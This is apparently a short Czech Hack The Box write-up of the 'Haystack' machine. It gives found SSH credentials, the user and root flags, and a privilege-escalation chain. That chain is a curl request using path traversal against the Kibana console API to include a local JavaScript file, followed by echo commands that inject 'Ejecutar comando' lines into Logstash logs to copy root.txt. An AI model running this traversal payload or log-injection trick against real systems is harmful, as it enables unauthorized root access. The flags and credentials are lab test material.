tom@home.htb:~$

Blog o HTB

2 December 2020

Haystack

Úvod a kontext

Na Haystack je nejzajímavější, jak se propojí local file inclusion, Splunk a Elastic stack.

Bez pochopení této návaznosti by nedával smysl ani stabilní uživatelský přístup, ani závěrečná automatizovaný job nebo špatně navržený skript opřený o logstash_tm.log a logstash_tm2.log.

Získání přístupu

Získání user flagu

User flag zde slouží hlavně jako potvrzení, že už mám běžný uživatelský kontext a mohu pokračovat v lokální analýze systému.

Následující úsek zachycuje přechod k uživatelskému přístupu a jeho ověření přes user.txt.

user: security
pass: spanish.is.key
user: 04d18bc79dac1d4d48ee0a940c8eb929

Eskalace oprávnění

Získání root flagu

Tento krok ukazuje, jak se nalezená slabina nebo chyba v delegaci oprávnění mění v privilegovaný přístup.

Následující úsek zachycuje i postup, kterým se potvrzuje privilegovaný přístup a načtení root.txt.

curl "http://127.0.0.1:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../tmp/tm.js"
Pomcka: http://grokdebug.herokuapp.com/
echo "Ejecutar comando: cp /root/root.txt /tmp/root.txt" > /opt/kibana/logstash_tm.log
echo "Ejecutar comando: chown security: /tmp/root.txt" > /opt/kibana/logstash_tm2.log
root: 3f5f727c38d9f70e1d2ad2ba11059d92

Shrnutí klíčových poznatků

Co si odnést do praxe

tags: ssh - exploit - enumeration - privesc - hackthebox